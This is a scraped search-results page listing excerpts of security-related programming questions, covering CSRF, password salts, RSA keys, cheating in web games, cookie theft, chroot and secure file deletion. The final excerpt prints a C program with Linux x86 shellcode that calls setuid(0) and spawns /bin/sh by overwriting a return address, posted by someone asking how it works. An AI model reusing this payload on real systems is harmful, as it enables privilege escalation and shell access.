Search Results

Search found 13853 results on 555 pages for 'soa security'.

Page 175/555 | < Previous Page | 171 172 173 174 175 176 177 178 179 180 181 182  | Next Page >

  • log in as a proxy for a certain user

    - by Samuel
    We have a requirement, wherein the administrative user needs to proxy in as a certain user in an environment where several users (Role: User) are managed by an administrator (Role: Admin). e.g If we have the following users in the database (admin, user1, user2, user3), we would want the admin to proxy as 'user2' and use the system in certain scenarios. Authentication in our web application is based username / password credentials, what mechanisms are available for the admin to proxy as 'user2' when he doesn't have the password for 'user2'. How can the application track such access for audit purposes to mention that 'admin' had proxied for 'user2' and performed certain actions. I am looking for suggestions on supporting this in our j2ee (jboss seam) web application.

    Read the article

  • Ruby on Rails protect_from_forgery best practice

    - by randombits
    I'm currently working on building a RESTful web api with ruby on rails. I haven't bothered putting a proper authentication scheme into the API yet as I'm ensuring that tests and the basic behavior of the API is working all locally first. Upon testing non-HTTP GET type requests such as HTTP POST/DELETE/PUT, stuff chokes because protect_from_forgery is on by default. How does this work when I'm working in practice since essentially the idea is in a RESTful API that there is no state. The client does not have a session or a cookie associated with the server. Each request is an atomic, self-executed request. The user will supply some credentials to ensure they are who they say they are, but other than that, does protect_from_forgery make sense at this point? Should it remain enabled?

    Read the article

  • Securing a .NET Application [closed]

    - by beakersoft
    Duplicate: Protecting .NET Code from Reverse Engineering We've recently released a small application and this weekend I found a cracked version of it on Piratebay that had the registration checking removed, so the app ran as if it was a registered version. Apart from using a code obfuscation tool (which doesn't seem to be that hard to get around), are there any standard things we should be doing to make our .NET applications more difficult to crack?

    Read the article

  • Salt question - using a "random salt"

    - by barfoon
    Hey everyone, Further to my question here, I have another question regarding salts. When someone says "use a random salt" to pre/append to a password, does this mean: Creating a static a 1 time randomly generated string of characters, or Creating a string of characters that changes at random every time a password is created? If the salt is random for every user and stored along with the hashed password, how is the original salt ever retrieved back for verification? Thanks!

    Read the article

  • Running shell scripts with sudo through my Rails app

    - by nfm
    In my Rails app, I have some functionality that interfaces with the server's OS. I've written a bash script, put it in my lib/ subdirectory, and can run it from my controller. However, some functionality of the script requires superuser privileges. What is the most sane way to run this script securely? It is being passed arguments from a web form, but should only be able to be called by authenticated (and trusted) users.

    Read the article

  • RSA public key exportation

    - by user308806
    Dear all, Here is my code KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA"); KeyPair myPair = kpg.generateKeyPair(); PrivateKey k = myPair.getPrivate(); System.out.print(k.serialVersionUID); Cipher c = Cipher.getInstance("RSA"); c.init(Cipher.ENCRYPT_MODE, myPair.getPublic()); String myMessage = new String("Testing the message"); byte[] bytes = c.doFinal(myMessage.getBytes()); String tt = new String(bytes); System.out.println(tt); Cipher d = Cipher.getInstance("RSA"); d.init(Cipher.DECRYPT_MODE, myPair.getPrivate()); byte[] temp = d.doFinal(bytes); String tst = new String(temp); System.out.println(tst); My question is how can i get the public key and stored elsewhere

    Read the article

  • How to make a secure game in javascript ?

    - by rnaud
    Hello, I'm working on games using javascript some html and css, and I was wondering if there was any way to secure the game so that the user can't just call game.php?result=victory to finish the game and earn some point. As of right now here are the solution I have. For a chance game, start the page with the result already in place, win or loose, then just do some animations to show it, but all the score and win/loose stuff is done server-side. For a battle game, just get the action from the javascript call, and do the damage calculation, reaction of the oponent on the server and just send back the data. but the last solution imply that I will have to send actions each time the user do anything. This might work for a turn by turn battle game, but I think it would be to slow for any other kind of game. So my question is, is there some kind of secure way I can prep my javascript to secure the infomation sent.

    Read the article

  • prevent bots to query my database several times

    - by Alain
    Hi all, I'm building an application that is a kind of registry. Think about the dictionary: you lookup for a word and it return something if the word is founded. Now, that registry is going to store valuable informations about companies, and some could be tempted to get the complete listing. My application use EJB 3.0 that replies to WS. So I was thinking about permits a maximum of 10 query per IP address per day. Storing the IP address and a counter on a table that would be empty by a script every night. Is it a good idea/practice to do so? If yes, how can I get the IP address on the EJB side? Is there a better way to prevent something to get all the data from my database? I've also though about CAPTCHA but I think it's a pain for the user, and sometime, they are difficult to read even for real human. Hope it's all clear since I'm not english... Thanks Alain

    Read the article

  • Handling User Authentication in C#.NET?

    - by Daniel
    I am new to .NET, and don't have much experience in programming. What is the standard way of handling user authentication in .NET in the following situation? 1.In Process A, User inputs ID/Password 2.Process A sends the ID/Password to Process B over a nonsecure public channel. 3.Process B authenticates the user with the recieved ID/Password what are some of the standard cryptographic algorithms I can use in above model? The users(customers that bought my company's software) will be running the software(Process A) locally in their computer(connected to internet). I need to authenticate the users so that only registered users can run the program. Thank You!

    Read the article

  • Can IIS admin change password of Windows Service account

    - by sweta Jha
    We have a service account defined for anonymous access which is used for several web sites hosted on the web server. This account has access to several network resources like report server, file servers and so on. While deploying a new web site, we used the same service account for anonymous access. IIS takes the username/password for the account and then a dialog opens for confirm password. Accidently, we gave a wrong password in both the text boxes, the new site with wrong password is working fine but all other previously hosted sites which were using the service account, started giving the unautorized access error. Is it possible that when we entered wrong password for the new web site, the password of the account got reset and all sites stopped functioning?

    Read the article

  • Create certificate for a client app in .NET

    - by galets
    I'm looking for a server app to be routinely generating certificates for client applications using self-signed root. Is there any streamlined process in .NET to programmatically generate those certificates? I can, of course, keep spawning makecert or openssl, but I was looking for more programmatic, in-memory method, when you just get X509Certificate on output. If someone got a code snippet, can you please share?

    Read the article

  • Unable to create website error (NEW)

    - by salvationishere
    I copied my ClickOnce deployment to my C:/Inetpub/ folder on my webserver and I deleted my Virtual directory. I deleted the WpfApplication1 folder beneath wwwroot in Win Explorer. Then I turned on Web Sharing for this folder. Then I viewed my IIS Manager and this new Share name appeared under wwwroot. So now under Inetpub folder on my web server I have the following directory path: C:\Inetpub\WpfApplication1\ with contents: Application Files publish.htm setup.exe WpfApplication1.application Next, I remapped both the publishing and installation URL's for the project to http://myserver/WpfApplication1/ And I clicked Publish Now. But after I performed a Publish Now operation, I got the following error on my development server (D610-M): Error 1 Failed to connect to 'http://myserver/WpfApplication1/' with the following error: Unable to create the Web site 'http://myserver/WpfApplication1/'. The Web server does not appear to have any authentication methods enabled. It asked for user authentication, but did not send a WWW-Authenticate header. 1 1 WpfApplication1 On my webserver, when I click Browse from the IIS Manager on the WpfApplication1 directory, it shows me the Install page. But after I click the Browse button, it returns an error which says: The remote name could not be resolved: 'd610-m' (D610-M is the name of my development server). How do I fix this?

    Read the article

  • Secure Webservice (WCF) without storing credentials on consumer application

    - by Pai Gaudêncio
    Howdy folks, I have a customer that sells a lottery analysis application. In this application, he consumes a webservice (my service, I mean, belongs to the company I work for now) to get statistical data about lottery results, bets made, amounts, etc., from all across the globe. The access to this webservice is paid, and each consult costs X credits. Some people have disassembled this lottery application and found the api key/auth key used to access the paid webservice, and started to use it. I would like to prevent this from happening again, but I can't find a way to authenticate on the webservice without storing the auth. keys on the application. Does anyone have any ideas on how to accomplish such task? ps1.Can't ask for the users to input any kind of credentials. Has to be transparent for them (they shouldn't know what is happening). ps2. Can't use digital certificates for the same reason above, not to mention it's easy to retrieve them and we would fall into the original problem. Thanks in advance.

    Read the article

  • How to chroot Django

    - by Brian M. Hunt
    Can one run Django in a chroot? Notably, what's necessary in order to set up (for example) /var/www as a chroot'd directory and then have Django run in that chroot'd directory? Thank you - I'm grateful for any input.

    Read the article

  • can some hacker steal the cookie from a user and login with that name on the web site ?

    - by Aristos
    Reading this question different users get the same cookie value in aspxanonymous and search for a solution, I start thinking, if it is possible for some one to really steal the cookie with some way, and then place it on his browser and login lets say as administrator. Do you know how form authentication can ensure that even if the cookie is stoled, the hacker not actual login using it ? Or do you know any other automatic defense mechanism ? Thank you in advanced.

    Read the article

  • Is it dangerous to keep an admin page to administer your database?

    - by Scarface
    Hey guys I have an admin page that checks if you are admin before submitting any queries, and contains a header to the index page if you are not admin, but I am worried about protecting the page. I am concerned someone may be able to destroy my database with it. Does anyone have any recommendation into protecting a page like this, if not, should I just manually admin my database through phpmyadmin and delete the page all together?

    Read the article

  • Securely erasing a file using simple methods?

    - by Jason
    Hello, I am using C# .NET Framework 2.0. I have a question relating to file shredding. My target operating systems are Windows 7, Windows Vista, and Windows XP. Possibly Windows Server 2003 or 2008 but I'm guessing they should be the same as the first three. My goal is to securely erase a file. I don't believe using File.Delete is secure at all. I read somewhere that the operating system simply marks the raw hard-disk data for deletion when you delete a file - the data is not erased at all. That's why there exists so many working methods to recover supposedly "deleted" files. I also read, that's why it's much more useful to overwrite the file, because then the data on disk actually has to be changed. Is this true? Is this generally what's needed? If so, I believe I can simply write the file full of 1's and 0's a few times. I've read: http://www.codeproject.com/KB/files/NShred.aspx http://blogs.computerworld.com/node/5756 http://blogs.computerworld.com/node/5687 http://stackoverflow.com/questions/4147775/securely-deleting-a-file-in-c-net

    Read the article

  • can anyone explain this code to me???

    - by Abed
    //shellcode.c char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main() { int *ret; //ret pointer for manipulating saved return. ret = (int *)&ret + 2; //setret to point to the saved return //value on the stack. (*ret) = (int)shellcode; //change the saved return value to the //address of the shellcode, so it executes. } can anyone give me a better explanation

    Read the article

< Previous Page | 171 172 173 174 175 176 177 178 179 180 181 182  | Next Page >